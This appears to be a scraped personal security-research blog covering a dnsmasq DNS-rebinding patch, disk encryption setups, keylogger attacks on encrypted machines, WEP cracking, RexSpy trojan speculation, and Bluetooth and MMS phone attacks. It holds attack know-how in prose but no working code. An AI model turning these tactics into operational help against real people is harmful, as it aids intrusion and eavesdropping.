[1] code.google.com/p/iphone-elite/wiki/JerrySim
[2] Exploit code from Google cache

here is a patch for Dnsmasq (the very popular DHCP server and DNS forwarder and cache) that will prevent DNS rebinding attacks against private networks (192.168,10.,...). The patch basically adds a filter to the forward resolver of Dnsmasq. The filter will basically drop all private IP addresses contained in answers. Of course this will not prevent a rebinding attack against other IP ranges like if your local network uses some public IP range. But since Dnsmasq is mainly used for home Cable/DSL routers (like the OpenWRT-based routers) this patch should offer sufficient protection.

dnsmasq_stopdnsrebind.patch (for dnsmasq 2.40)

To activate the DNS rebinding protection add --stop-dns-rebinding to the dnsmasq command line. I made it a command line option since dnsmasq is also used as a DNS cache on clients (e.g. Nokia N800) and you still want to be able to resolve local IP addresses.


Feedback is welcome!

Links

DNS rebinding
DNS rebinding (wikipedia)
DNS rebinding talk (by Dan Kaminsky)
Dns-wall
Dnsmasq
OpenWRT.org
0sec

Last week I moved my last computer to full disk encryption (FDE if you need an acronym). The last computer was my desktop/laptop therefore I thought it will be slightly more work since I wanted to have suspend to disk (aka. hibernation) - it turned out to be quite easy after all (see 1).

Previously I had setup my rented root server and my home server using a small hand build system you can ssh to in order to open the root partition and continue to boot the real system (see 2).

In the recent days I did some research on possible attacks against fully crypted computer systems. Basically there is only one attack (if we rule out a brute force attack against the encryption key) this is keylogging. Keylogging basically is trying to capture all key strokes in order to obtain the passphrase for the crypted disk. Keylogging can be be done in either soft- or hard-ware both have advantages and disadvantages for both the attacker and the victim (the owner of the crypted disk).

Hardware keyloggers basically are small devices that are plugged in between the computer and the keyboard. The device then just logs all key strokes that it sees. The big advantage (for the attacker) is that this is totally OS independent. The big disadvantage for attacker of course is that he needs physical access to the victims computer twice (once to install once to retrieve the logged data). Further the victim can more or less easily find a hardware key logger if he cares to look for one. Also there are PCI-card based keyloggers (see [3]) that are probably harder to find (the computer would need to be opened). There are also keyboards with build in keyloggers (see [4]) but I doubt that these are any good since most people would recognize if their keyboard has suddenly changed. Of course you could also open up the victims keyboard and place the keylogger there, but there is always a chance that you break the keyboard while doing this. The biggest disadvantage of hardware keyloggers is that these can't monitor remote login sessions which can also be used to decrypt and boot a computer, this is where software keyloggers come into play.

Software keyloggers come in two variants, the general kernel/driver based keylogger that just monitors all keyboards and terminal devices (e.g. a remote session) and the application based keylogger where a specific application is modified so that it logs some specific or all input (e.g. the decrypt command could be modified to log the passphrase). So software keyloggers have the advantage that they can log more data (local + remote sessions) but have the big disadvantage that the attacker needs system level access to the plain not encrypted part of the computer (e.g. the boot partition) in order to place the modified kernel or binaries. If the hardware is probably secured (e.g. not booting from external disk or cdrom) the software manipulation will take really long since the hard disk would need to be removed (or at least the PC would need to be opened). Also this might not be possible at all if the victim always boots the computer from an USB stick that he carries around with him at all times. In this case there wouldn't be a plain boot partition on the PC and therefore nothing to modify. If the victim still needs to type-in the crypto password a hardware keylogger could catch him.

Laptops seem special while searching for keyloggers I only found that laptops are harder to attack since they are relatively small and therefore don't have much space to hide a hardware keylogger. The only thing I found was a Mini-PCI card based keylogger (see [5]) but since most laptops have Mini-PCI wireless cards this looks quite strange? Of course you could always disassemble the laptop to add a keylogger but this also takes a lot of time and there is always the chance to break it. The best time to do this would be if you send your laptop in for repair.

PDAs I like my Palm Tungsten T5 because it supports complete filesystem encryption. Of course this encryption is not verifiable since the source is not open but at least it is a secure algorithm (AES).

Backups don't forget to encrypt your backups. Having a fully crypted PC and plain text backup is just stupid. Good backup software should support this. Otherwise PGP/GPG your ZIPs/tarballs/whatever.

I would say that keylogging is only feasible under certain conditions: the attacker is extremely knowledgeable and the victim is some how unaware. All other cases would involve a huge portion of luck for the attacker.

[1] good starting point for crypto suspend: howto completly encrypted harddisk including suspend to encrypted disk with ubuntu
[2] small howto on: build a crypted root server
[3] PCI-based keylogger
[4] Keyboard with built in keylogger
[5] Mini-PCI keylogger
[6] USB keylogger

Marko Rogge finally published his article on RexSpy (see my comments on RexSpy). Marko and I talked a lot about RexSpy in order to determine if a bug/attack like Hafner described is possible at all.

The article is available as Blog Entry and PDF

One actually funny part of the whole story is that after I published my comments on RexSpy I got tones of emails from various people of which some seem to hope that I know how it works. So folks tried to get more information from me (I didn't have any more information). One guy even had product ideas based on this technology. Just hilarious!

some time ago I setup a new root server for a new project of a friend and myself, this time I wanted to go full crypto. In the beginning I thought this might be a lot of work but as it turned out it is quite simple if you do some thinking.

There are many ways to do this, this is how I did it.

The setup works like this: the server boots into a minimal system starting only the SSH daemon. The you login and enter/upload the passphrase to unlock the disk(s). Finally you tell the system that you are done, after which you are kicked out and the system completes the boot by mouting the real root partition and executing init from there. At this point everything is as usual.

There are two basic parts in this setup: first building a good minimal system so you don't waste too much space and second build the init script for the minimal system.

The minimal system needs to contain stuff like: sshd, filesystem tools such as mkfs, fsck, fdisk, etc., cryptsetup, networking tools like ifconfig, route, ip, etc., mdadm (if you run raid), and of course all the required libraries. The easiest way to do this is using the recovery tool your hoster provides. Just setup a minimal system on one partition and strip it down before moving it to the boot partition.

The init script is quite simple, it needs to do three things: first, configure the network (ip address and route); second, start sshd; and third, start the actual system after the root partition has been unlocked. My script works as follows: after sshd has been started the script waits for a file to be created in the tmp directory. As soon as the file is created all ssh processes are killed, and the real system is booted.


Files:

file list of my minimal system
init script for minimal system (touch /tmp/READY_TO_BOOT after you unlocked the root partition)

Some notes:

You need to encrypt your swap otherwise this is useless!
If you upload a key to your minimal system only upload to key to a ram drive, never write it to disk. Otherwise all the work is useless!
Remember your key! Remember your key! Remember your key!

Todo:

Filesystem integrity check for the minimal system. This is a very hard task and I don't have a solution so far.

I just benchmarked Aircrack-ptw on my Nokia N800 (ARMv6 320Mhz) and it finished in 19 seconds. Sadly enough the wireless packet injection doesn't work on the N800/770. 19 Seconds is quite impressive.

Erik Tews with the help of two others published a new attack on WEP called: Breaking 104 bit WEP in less then 60 Seconds.

Like the older attacks on WEP this attack uses sniffed IVs in order to break/compute/crack the WEP key. The nice thing about this attack is that it only needs between 40.000 and 85.000 unique IVs (older attacks needed between 250.000 and 1.000.000 in order to succeed). This already reduces the overall attack time since one needs to capture less packages. But the attack also uses a new/other attack on RC4 which further improves the speed. The paper gives an average of 3 seconds on 1.7Ghz Pentium-M. The attack even works with 5000 keys.

Paper
Info and tool

here are the slides on RexSpy. They say nothing at all, I just post the link for completeness.

since I first heard about RexSpy in late February (I know it was announced in October 2006) I wanted to know how real it is and how it works.

RexSpy is supposed to be the ultimate mobile phone trojan that allows one to monitor (listen to) all calls of the infected device. Also the Wilfrid Hafner (the author) claims that it works on every single mobile phone.

The German Focus (a mainstream non technical magazine) interviewed Hafner and did a trial using a SymbianOS and WinCE based phone. They claim that he could listen to calls made with both phones. Other websites like Techworld.com quote him saying that this attack also works against a Siemens C45 (which is a very simple phone with out a fancy smart phone OS).

I myself connected Hafner to find out if he is willing to release real technical information to the public about his findings, but he refused saying that he sold the RexSpy Technology and therefore no longer could publish any material. This is very bad especially because Hafner's company is selling a protection kit against mobile phone tapping. This makes you wonder if this is just a marketing thing.

Since I'm not a student anymore I don't have too much spare time on my hands so I only did some basic research. The basic operation of RexSpy as claimed by Hafner is: the trojan is install via a SMS (a Service-SMS to be precise). The trojan itself creates a kind of back channel by calling home as soon as the infected phone has an incoming or outgoing call, thereby the attacker can listen to the call. But how does this work? First idea was: a bug/feature in the GSM module or SIM card (or SIM Toolkit). A bug is kind of unlikely to be present on all platforms. A monitoring feature would be documented by someone, so this is also unlikely.

I searched a little more and found the recording of Hafner's talk at Systems, in his talk he kind of gives it away (if you know what you have too look for). He says he only implemented it for Windows Mobile (WinCE / PocketPC). That is very interesting since he first claims the RexSpy is universal across all platforms. The thing that keep me thinking is the Service-SMS which others (including myself) call binary-SMS, since I used binary-SMS for my MMS attack. Here you basically tell the device where to download a MMS message. But as far as I remember there are other binary-SMS messages (or actually WAPPush messages that are send via binary-SMS) that tell a mobile phone to go and download a WAP/WEB page. The URL could of course also point to a application binary, which could be downloaded and executed without user interaction. So maybe Hafner just found a small back door in the WAPPush handler that allows silent application installation, and writing a phone monitor tool for Windows Mobile and SymbianOS shouldn't be hard at all. For monitoring one could use the simple feature like a conference call, this way the trojan application would be very simplistic and small.

I'm still not 100% sure how it works (especially because he claims that it works with a old Siemens C45) but analyzing the Windows Mobile RexSpy Killer provided by SecurStar should bring me a step further (I haven't done this yet). I'll keep working on this and keep you updated.


I would really love to hear some comments on this.

Links:
Zone-H
Techworld (Hafner's talk at Systems in German language)
SecurStar

I just uploaded the web page I made for HID Attack. It explains how it all works. Enjoy.

Finally I released my HID attack kit I build over a year ago, get it here. Thanks to Thierry for including it in his talk!

Story on Heise.

Gary McGraw's Silver Bullet Podcast is a real nice podcast on computer security. If you are a security person check it out!

The Reliable Software Group (RSG) the lab I used to work for at UCSB finally put up the new website including all my Smart Phone Security research. I also put up my Master's Thesis titled Security of Smart Phones.

I also updated my Mobile Security Research website.

I'm going to do my 0wnd by an MMS talk at 23c3. The talk is more or less a redo from defcon-14, but I will try to fix it up a little. This will be my first talk at a Chaos Communication Congress and I'm already looking forward to it.

my second scientific paper, this time at ACSAC. The topic is MMS again - actually the paper was done before DEFCON. For more infos see details for Session 2. The paper is the last one in the session.

PS: I also applied to 23c3 with the same topic aka the DEFCON talk.

I'll be giving a talk at this years defcon (#14). My talk will be on Advanced Attacks Against PocketPC Phones and I will show some neat new stuff for/against PocketPC phones.

I've added greylisting to the list of spam countermeasures for our server project. It works surprisingly well and the amount of spam arriving at my inbox is reduced by a ratio of 20:1. While this is good there are of course downsides of greylisting such as an artificial delay for delivery of valid or good email. Also auto whitelisting should take care of regular contacts. Anyway I'm really interested in how many of our users will see the change in amount of spam vs. delivery delay, and if anyone of them will demand permanent whitelisting :-)

My (with others) first scientific paper: Using Labeling to Prevent Cross-Service Attacks Against Smart Phones

just put up my mobile security research page. It will basically be a annotated link collection, since my stuff will mostly be PocketPC Security and I have a separate section for this. Feel free to send me additions and/or corrections.

Pierre Betouin wrote this nice little L2CAP fuzzer based on my psm_scan (l2cap port scanner). He also already discovered bugs in several phones with it.

The tool can be found at: www.secuobs.com

nice work!

mh57 just pointed me to a Spiegel Online article about Bluetooth advertising or BlueSpam as I like to call it. Its about a German company which uses Bluetooth to beef up their billboards in Berlin. Apparently they just push images, videos, text ads and coupons to any Bluetooth device in range. This is annoying but you can of course just ignore/reject the transmission or turn of visibility. The actual security/privacy problem is that people maybe get used to accept connections from certain senders e.g. BlueSpam (of course you wouldn't name your system BlueSpam). So what keeps me from standing next to one of the billboards naming my laptop BlueSpam and instead of sending a coupon I send hello.jpg. And since some phones still don't show what the Bluetooth connection is for I just pull their phonebook etc., the user will just see Allow connection from BlueSpam? Sure I want that coupon.

This is not a good idea!

Btw. the company doing this stuff is: Wall AG

on Friday Dec. 09. another UCSB iCTF took place once again. As always I was just helping out (the main work is done by others Greg,Vika and Marco) writing services, placing backdoors and doing what ever is needed. Every time the event gets bigger and bigger, this time there were 22 teams with about 20 players each plus 2-5 admins for each team and about 10+ people at UCSB organizing - this is about 500 people!

In the last years teams from Italy dominated the CTF, but not this time! The winners are all German speaking #1 Aachen, #2 Vienna and #3 Darmstadt. The full scoreboard with all teams is here.

This was really fun, even for just watching the teams fighting each other :-)

I all ways wanted to go crypto for my data storage but until now I never owned any big storage device. Now I have an external 250 gig USB disk which I want to secure.

The thing with crypted disk all ways comes down to where can I read the disk? Only on my computer, only with one specific OS, etc. For me it's basically Linux and from time to time Windows. The two solutions I found where BestCrypt which is commercial (at least for Windows) and dm_crypt/FreeOTFE which is free and has much more features.

I ended up using dm_crypt/FreeOTFE.

dm_crypt is the Linux part of the crypto solution and is in part of Linux Kernel since 2.6.4. With cryptsetup its super simple to setup. You can setup a partition or a file based crypto device. The device then can be formated with whatever filesystem you want. Of course you need one which is readable by Windows (e.g. vfat/fat32).

FreeOTFE is the Windows counterpart of dm_crypt and can mount whatever you created with dm_crypt. I guess multi-disk volumes don't work but I haven't tryed it. When mounting a filesystem use mount Linux... otherwise it doesn't work :)

For the external USB disk I have two partitions, one small partition which is not encrypted - this holds the Windows drivers (FreeOTFE), the second partition is the crypto filesystem. With this you can also take your disk to a friend without downloading drivers and stuff from the net. All in all a nice solution.

MobileBugtraq is a new bugtracking maillinglist dedicated to mobile device technology. The list is super new, so not many posts by now. I actually only saw two sofar and I couldn't find an archieve.

Anyway everybody who is into mobile and security (like myself) should check it out.

while doing some web research on PDA/phone security I found this company Paraben which sells special seizure equipment for PDAs and phones. They really sell a lot of crazy stuff. I especially like the StrongHold Tent (the image on the left).

today (at/for 21C3) Martin and I released our Bluetooth fingerprinting tool BluePrint.

It is a really nice and simple Perl script and just reads the output of sdptool (BlueZ). Please also check the Bluetooth Device Security Database.

I just started learning how to write exploits utilizing buffer overflows. It is a real fun thing to do and the best part of all: it is a part of a homework for university :-) Now I know why many people write exploits it is a nice way to get around a rainy weekend day.